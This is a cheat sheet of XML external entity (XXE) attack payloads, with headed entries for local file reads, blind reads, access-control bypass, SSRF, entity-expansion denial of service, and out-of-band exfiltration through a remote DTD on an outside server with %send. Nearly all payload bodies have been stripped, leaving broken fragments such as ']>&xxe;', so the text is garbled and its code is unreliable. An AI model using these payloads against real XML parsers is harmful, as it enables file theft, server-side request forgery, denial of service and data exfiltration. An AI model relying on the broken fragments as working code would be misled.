**LFI Test**
```
]>&xxe;
```
**Blind LFI test (when first case doesn't return anything)**
```
]>&blind;
```
**Access Control bypass (loading restricted resources - PHP example)**
```
]>
∾
```
**SSRF Test**
```
]>&xxe;
```
**XEE (XML Entity Expansion - DOS)**
```
]>
&lol9;
```
**XEE #2 (Remote attack - through external xml inclusion)**
```
]>
3..2..1...&test
```
**XXE FTP HTTP Server**
https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
```
%remote;
%send;
]>
4
File stored on http://publicServer.com/parameterEntity_sendftp.dtd
">
%param1;
```